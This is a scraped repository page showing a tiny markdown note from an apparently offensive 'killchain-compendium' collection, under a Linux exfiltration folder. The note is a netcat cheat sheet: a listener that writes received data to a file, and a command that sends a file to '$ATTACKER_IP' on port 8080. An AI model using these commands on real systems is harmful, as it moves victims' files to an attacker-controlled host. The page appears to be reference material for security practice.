This website requires JavaScript.
Explore
Help
Sign In
whx
/
killchain-compendium
Watch
1
Star
0
Fork
You've already forked killchain-compendium
0
Code
Issues
Pull Requests
Projects
Releases
Wiki
Activity
cf50085db3
killchain-compendium
/
exfiltration
/
linux
/
nc.md
132 B
Raw
Blame
History
Netcat
RX
nc -lp
8080
> out.txt
TX
nc
$ATTACKER_IP
8080
< in.txt
Have to be end manually after a while